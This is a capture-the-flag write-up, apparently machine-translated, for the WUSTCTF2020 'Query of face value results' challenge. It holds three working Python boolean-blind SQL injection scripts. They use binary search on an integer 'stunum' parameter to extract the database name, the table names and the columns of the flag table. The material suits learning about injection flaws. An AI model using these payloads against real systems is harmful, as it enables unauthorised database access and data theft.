[WUSTCTF2020] Query of face value results
Integer injection, blind injection.
Fast speed, we must dichotomy.
Explode library name: ctf
Dichotomy core payload
"if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i , mid)
import requests
url = "http://8a12a75e-26f1-4a40-ad74-95086cfef9df.node3.buuoj.cn/?stunum="
result = ""
i = 0
while( True ):
i = i + 1
head=32
tail=127
while( head < tail ):
mid = (head + tail) >> 1
payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i , mid)
r = requests.get(url+payload)
r.encoding = "utf-8"
#print(url+payload)
if "your score is: 100" in r.text :
head = mid + 1
else:
#print(r.text)
tail = mid
last = result
if head!=32:
result += chr(head)
else:
break
print(result)
The echo results refer to the following figure:
Burst watch
flag,score
import requests
url = "http://8a12a75e-26f1-4a40-ad74-95086cfef9df.node3.buuoj.cn/?stunum="
result = ""
i = 0
while( True ):
i = i + 1
head=32
tail=127
while( head < tail ):
mid = (head + tail) >> 1
#payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i , mid)
payload = "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i , mid)
r = requests.get(url+payload)
r.encoding = "utf-8"
#print(url+payload)
if "your score is: 100" in r.text :
head = mid + 1
else:
#print(r.text)
tail = mid
last = result
if head!=32:
result += chr(head)
else:
break
print(result)
The echo results refer to the following figure:
Burst listing
Burst two fields, flag and value
import requests
url = "http://8a12a75e-26f1-4a40-ad74-95086cfef9df.node3.buuoj.cn/?stunum="
result = ""
i = 0
while( True ):
i = i + 1
head=32
tail=127
while( head < tail ):
mid = (head + tail) >> 1
#payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i , mid)
#payload = "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i , mid)
payload = "if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flag')),%d,1))>%d,1,0)" % (i , mid)
r = requests.get(url+payload)
r.encoding = "utf-8"
#print(url+payload)
if "your score is: 100" in r.text :
head = mid + 1
else:
#print(r.text)
tail = mid
last = result
if head!=32:
result += chr(head)
else:
break
print(result)
Burst information
Flag table has two fields flag and value
Burst flag field
The result is as follows when it burst, without guessing the flag is in the value field.
Explode the value field and find that it is in the value field. If there is no painting, you have to explode something else.
There is also a dichotomy, which must be dichotomy. Otherwise, if you encounter some problems, you may finish the game and finish.